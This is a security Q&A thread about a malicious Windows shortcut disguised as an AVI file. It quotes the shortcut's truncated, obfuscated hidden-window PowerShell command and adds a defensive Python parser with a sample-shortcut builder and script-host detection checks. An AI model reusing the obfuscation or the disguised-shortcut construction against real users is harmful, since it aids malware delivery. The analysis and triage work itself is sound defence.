
I just ran an AVI file that was sent to me, thinking AVIs were safe. Turns out it was a Windows shortcut with this in the path:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd
1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',
[CHar[]](36 ,97,115, 112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,
79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116, 101 

I'm hoping the lack of closing parens means this was innocuous. Have I screwed myself?

Anders
Brad Irby
  • "$ ,a,s, p , x, ,=, ,( ,(, N, e , w, -,O , b, j,e,c, t , ,S, y , s,t, e" is the ASCII translation of the decimals... looks like there is more to this message. – DarkMatter Dec 05 '18 at 20:35
  • That's all that was in the "Target" textbox of the shortcut, at least from what I can see in Properties for the file. I assume I got lucky and the full string was cut off? Or can the "Target" text be longer than what is shown in the Properties window? – Brad Irby Dec 05 '18 at 20:45
  • I don't know the answer to that but I would strongly assume the latter. – DarkMatter Dec 05 '18 at 20:46
  • I looked it up: 260-character max path... you are at ~260 in that path. – DarkMatter Dec 05 '18 at 20:48
  • Do you have PowerShell logging turned on? – DarkMatter Dec 05 '18 at 20:52
  • I've not done it, so unless it's on by default, no. I used this https://blez.wordpress.com/2013/02/18/get-file-shortcuts-target-with-c/ to pull 10K chars out of the file starting at the first char of the Target. I can't tell if there's anything significant in there; it's just a bunch of "\0 \01\01\06\0" etc. for 10K chars. I do see something about Imageres.dll. What is that? – Brad Irby Dec 05 '18 at 21:10
  • Post some of the "chars" and I'll take a look. – DarkMatter Dec 05 '18 at 21:11
  • I couldn't post it here, too big. I shared the txt file here: https://1drv.ms/t/s!ApzPbwb_9H4Gg71GUZyEQlR_y0pczg – Brad Irby Dec 05 '18 at 21:21
  • Googling your string brings up some stuff, like this: https://forums.malwarebytes.com/topic/238650-powershell-virus/ Looks like it could be a huge file (700 MB?) with a lot of useless padding. Then it probably downloads malware from a website, which in turn is obfuscated. So yeah, totally malicious, but maybe difficult to know what it does exactly. – reed Dec 05 '18 at 21:22
  • `imageres.dll` is an icon repository. It probably is referenced to give the link an AVI icon. And I think your machine is infected. – ThoriumBR Dec 05 '18 at 21:23
  • ARGH! Yeah, it was a big file. I guess it's time for a rebuild anyway. – Brad Irby Dec 05 '18 at 21:26
  • A follow-up question. I'm looking at the Win 10 Reset function here: https://answers.microsoft.com/en-us/windows/forum/windows_10/how-to-perform-a-clean-install-using-reset-this-pc/6f6335fc-8d15-4598-af16-033d1d8c16bf. That should get rid of anything that was installed, right? – Brad Irby Dec 06 '18 at 11:51

2 Answers

Shortcut files (technically .lnk files) are mostly text and can be read using any program that tries to open the file rather than invoke ShellExecute on it. The text will contain the embedded command. The lack of closing parens, the incompleteness of the New-Object cmdlet, and so on probably mean you're fine so long as the shortcut is in fact truncated; if it isn't, you should probably assume the machine is compromised.


Out of curiosity, what shitty program transferred a .LNK file to you while hiding the extension? Very nearly all programs that hide the .LNK are aware that shortcuts can be malicious and will warn you, rename them, or outright block them. Did it suddenly get really twentieth-century in here? Anyhow, you should definitely report that as a security bug in the program (assuming, of course, it both did hide the .LNK and did not warn you).

CBHacking
  • I think OP received a `.lnk` file with the `avi` icon and double extension, and hit *Open* instead of *Save*... – ThoriumBR Dec 05 '18 at 21:20
  • Yes, that's exactly what happened. Even with extensions displayed in File Explorer, the .lnk doesn't show, so if you name something MyFile.avi.lnk it shows up like MyFile.avi in File Explorer. – Brad Irby Dec 05 '18 at 21:24
  • Please somebody tell me how it is possible, in 2018, that the most common OS on this planet, developed by one of the richest companies ever, can still allow something so blatantly stupid as not displaying dangerous file extensions or even allowing them to execute right away when you click it. I seriously cannot understand it. – reed Dec 05 '18 at 21:34
  • @ThoriumBR: The question was in what way it was received. If it was a flash drive, well, don't open files from sketchy flash drives. If it was some software (file sharing program, file transfer program, web browser, email client, chat client, etc.) then which one, because it really should have displayed a warning or at least displayed the true extension. With that said, I agree that the handling of shortcuts in Windows is terrible, although the little arrow icon is *reasonably* obvious to me. – CBHacking Dec 06 '18 at 07:31
  • @reed if all updates and security policies are configured correctly, there's no such thing as blindly (read: without warning) running ShellExecute on files in e.g. the Downloads folder or network drives. The extension being hidden sounds like an odd countermeasure. While it would help a tech-savvy person, the average secretary will gladly open your .sfx or .exe attachments (if they were possible). – Nomad Feb 04 '19 at 14:34
  • @BradIrby although not showing the .lnk extension, it should have shown the shortcut overlay, though. – Ángel Nov 01 '19 at 14:49
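The answer's advice is to read the shortcut as data instead of launching it. As an added example (not code from the question, the answer, or any tool named in the thread), here is a Python parser for the Shell Link layout documented in [MS-SHLLINK]: it walks the 76-byte header, skips the IDList, pulls the target path out of LinkInfo and reads the StringData fields, where the command-line arguments live with a 16-bit character count, which is why a parser sees the whole field even when the Properties dialog shows only the start of it. The sample .lnk is constructed in the block from the target path and argument fragment posted in the question; the icon path, volume serial and drive type are made up for the sample, and the ANSI strings are assumed to be cp1252.

```python
import struct

# LinkFlags bits of the ShellLinkHeader ([MS-SHLLINK] 2.1.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# StringData fields in file order; each is a 16-bit CountCharacters followed by the text.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe")


def parse_lnk(data: bytes) -> dict:
    """Read target, arguments and icon out of a .lnk by walking the bytes; nothing is executed."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"show_command": struct.unpack_from("<I", data, 0x3C)[0], "local_base_path": None}
    pos = 0x4C  # first byte after the fixed 76-byte header
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize, then the IDList itself
    if flags & HAS_LINK_INFO:
        info_size, _header_size, info_flags = struct.unpack_from("<III", data, pos)
        if info_flags & 0x1:  # VolumeIDAndLocalBasePath: NUL-terminated path in the ANSI code page
            start = pos + struct.unpack_from("<I", data, pos + 0x10)[0]  # LocalBasePathOffset
            info["local_base_path"] = data[start:data.index(b"\x00", start)].decode("cp1252")  # cp1252 assumed
        pos += info_size
    for flag, key in STRING_FIELDS:
        info[key] = None
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]  # up to 65535 characters, not 260
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            info[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return info


def build_sample_lnk(target: str, arguments: str, icon: str) -> bytes:
    """Assemble a minimal .lnk (header, LinkInfo with LocalBasePath, Unicode StringData,
    terminal block) so the parser can be exercised offline. Constructed sample, not a real file."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    # ShowCommand 7 = SW_SHOWMINNOACTIVE: the window opens minimized, without focus.
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 17, 3, 0x1234ABCD, 16) + b"\x00"  # fixed drive, empty label (made up)
    base_path = target.encode("cp1252") + b"\x00"
    vol_off, lbp_off = 0x1C, 0x1C + len(volume_id)
    suffix_off = lbp_off + len(base_path)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, vol_off, lbp_off, 0, suffix_off)
    link_info += volume_id + base_path + b"\x00"  # empty CommonPathSuffix
    def utf16(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + link_info + utf16(arguments) + utf16(icon) + struct.pack("<I", 0)


# Constructed sample: target and argument fragment are the ones posted in the question,
# joined to one line; the icon location is a hypothetical value in the style the thread mentions.
SAMPLE_TARGET = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = ("-NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '', "
               "[CHar[]](36 ,97,115, 112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45, "
               "79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116, 101")
SAMPLE_ICON = r"%SystemRoot%\System32\imageres.dll,-1"
SAMPLE_LNK = build_sample_lnk(SAMPLE_TARGET, SAMPLE_ARGS, SAMPLE_ICON)


def triage(info: dict) -> list:
    """Indicators a responder checks first in a parsed shortcut."""
    target, args, icon = info["local_base_path"] or "", info["arguments"] or "", info["icon_location"] or ""
    findings = []
    if target.lower().endswith(SCRIPT_HOSTS):
        findings.append("target is a script/command host: " + target)
    if "char[]" in args.lower().replace(" ", ""):
        findings.append("[char[]] array in arguments: string-building obfuscation")
    if len(target) + 1 + len(args) >= 260:
        findings.append("target plus arguments is %d chars, around the ~260 the Properties box shows"
                        % (len(target) + 1 + len(args)))
    if info["show_command"] in (2, 7):  # SW_SHOWMINIMIZED / SW_SHOWMINNOACTIVE
        findings.append("window starts minimized (ShowCommand %d)" % info["show_command"])
    if icon and icon.lower().split("\\")[-1].split(",")[0] != target.lower().split("\\")[-1]:
        findings.append("icon borrowed from another file: " + icon)
    return findings


if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed["local_base_path"], parsed["arguments"])
    print("\n".join(triage(parsed)))
```

To use it on the real file, replace `SAMPLE_LNK` with `open(path, "rb").read()`; the parser never calls into the shell, so opening the file this way is safe. Shortcuts that store the target only in the IDList or in an EnvironmentVariableDataBlock will come back with `local_base_path` set to `None`; the arguments field is still read.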

That fragment, FWIW, converts to

$aspx = ((New-Object Syste

... in which case it would seem unsuccessful if that really is the end of it.

Your question was "did I infect my machine?"

I'm going with "no" since it seems unlikely to have been successful under the circumstances provided (which is pretty common; a lot of exploits are broken / don't work under particular circumstances).

pacifist